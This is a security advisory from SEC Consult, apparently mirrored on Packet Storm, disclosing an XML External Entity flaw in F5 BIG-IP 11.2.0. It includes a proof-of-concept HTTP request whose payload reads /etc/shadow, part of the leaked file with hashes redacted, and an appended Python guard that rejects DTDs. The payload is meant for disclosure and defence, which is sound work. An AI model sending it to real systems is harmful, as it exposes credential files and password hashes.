packetstorm | S. Viehbock | PACKETSTORM:119738
Jan 22, 2013 - 12:00 a.m.

F5 BIG-IP 11.2.0 XML External Entity Injection


EPSS: 0.012 (percentile: 85.7%)

`SEC Consult Vulnerability Lab Security Advisory < 20130122-0 >  
=======================================================================  
title: XML External Entity Injection (XXE)  
product: F5 BIG-IP  
vulnerable version: <=11.2.0  
fixed version: 11.2.0 HF3  
11.2.1 HF3  
CVE number: CVE-2012-2997  
impact: Medium  
homepage: http://www.f5.com/  
found: 2012-09-03  
by: S. Viehböck  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor/product description:  
---------------------------  
"The BIG-IP product suite is a system of application delivery services that  
work together on the same best-in-class hardware platform or software virtual  
instance. From load balancing and service offloading to acceleration and  
security, the BIG-IP system delivers agility—and ensures your applications  
are fast, secure, and available."  
  
URL: http://www.f5.com/products/big-ip/  
  
  
Vulnerability overview/description:  
-----------------------------------  
An XML External Entity Injection (XXE) vulnerability exists in a BIG-IP  
component. This enables an authenticated attacker to download arbitrary files  
from the file system with the rights of the "apache" OS user. The BIG-IP  
configuration even allows access to the critical /etc/shadow file which  
contains the password hashes of users.  
  
  
Proof of concept:  
-----------------  
The following exploit shows how files can be extracted from the file system:  
  
POST /sam/admin/vpe2/public/php/server.php HTTP/1.1  
Host: bigip  
Cookie: BIGIPAuthCookie=*VALID_COOKIE*  
Content-Length: 143  
  
<?xml version="1.0" encoding='utf-8' ?>  
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>  
<message><dialogueType>&e;</dialogueType></message>  
  
  
The response includes the content of the file:  
  
<?xml version="1.0" encoding="utf-8"?>  
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client  
has sent unknown dialogueType '  
root:--hash--:15490::::::  
bin:*:15490::::::  
daemon:*:15490::::::  
adm:*:15490::::::  
lp:*:15490::::::  
mail:*:15490::::::  
uucp:*:15490::::::  
operator:*:15490::::::  
nobody:*:15490::::::  
tmshnobody:*:15490::::::  
admin:--hash--:15490:0:99999:7:::  
...  
  
  
Vulnerable / tested versions:  
-----------------------------  
The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.  
No modules have to be enabled for successful exploitation.  
  
  
Vendor contact timeline:  
------------------------  
2012-09-07: Contacting vendor - requesting PGP/SMIME key.  
2012-09-07: Vendor provides case number and PGP key.  
2012-09-11: Sending advisory draft and proof of concept.  
2012-09-20: Vendor has a fix for the vulnerability - will be released "with  
different hot fixes for different releases".  
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and  
11.2.1 HF3.  
2013-01-22: SEC Consult releases coordinated security advisory.  
  
  
Solution:  
---------  
Update to 11.2.0 HF3 or 11.2.1 HF3.  
  
Patch information is also available at:  
http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html  
  
  
Workaround:  
-----------  
No workaround available.  
  
  
Advisory URL:  
--------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Unternehmensberatung GmbH  
  
Office Vienna  
Mooslackengasse 17  
A-1190 Vienna  
Austria  
  
Tel.: +43 / 1 / 890 30 43 - 0  
Fax.: +43 / 1 / 890 30 43 - 25  
Mail: research at sec-consult dot com  
www.sec-consult.com  
  
  
EOF S. Viehböck / @2013  
`
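
A defensive counterpart to the proof of concept above, as an added example that is not part of the SEC Consult advisory or of F5's fix: an XML consumer that refuses any DOCTYPE, entity declaration or external entity reference before the document reaches application code. It assumes the `<message>` format never needs a DTD; `ForbiddenXML`, `parse_message`, `screen` and the benign sample are hypothetical names and constructed input.

```python
from xml.parsers import expat
import xml.etree.ElementTree as ET


class ForbiddenXML(ValueError):
    """The document carries a DTD or an entity declaration."""


def parse_message(body: bytes) -> ET.Element:
    """Reject DTD constructs with a guard pass, then build the element tree."""
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise ForbiddenXML(f"DOCTYPE not allowed (root {name!r})")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        raise ForbiddenXML(f"entity declaration not allowed ({name!r})")

    def on_external_ref(context, base, system_id, public_id):
        raise ForbiddenXML(f"external entity not allowed ({system_id!r})")

    guard = expat.ParserCreate()
    guard.StartDoctypeDeclHandler = on_doctype
    guard.EntityDeclHandler = on_entity_decl
    guard.ExternalEntityRefHandler = on_external_ref
    guard.Parse(body, True)       # handler exceptions propagate to the caller
    return ET.fromstring(body)    # reached only for DTD-free, well-formed input


def screen(body: bytes) -> str:
    """Classify one request body the way a server-side gate would."""
    try:
        root = parse_message(body)
    except ForbiddenXML as exc:
        return f"rejected: {exc}"
    except (expat.ExpatError, ET.ParseError) as exc:
        return f"malformed: {exc}"
    return f"accepted: dialogueType={root.findtext('dialogueType')!r}"


# Request body quoted in the advisory's proof of concept.
POC_BODY = b"""<?xml version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>"""

# Constructed benign message in the same format.
BENIGN_BODY = b"<message><dialogueType>any</dialogueType></message>"

if __name__ == "__main__":
    for sample in (POC_BODY, BENIGN_BODY, b"<message>"):
        print(screen(sample))
```

The guard rejects on the DOCTYPE itself, so the entity is never declared, let alone resolved, and the file path in the declaration is never opened.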
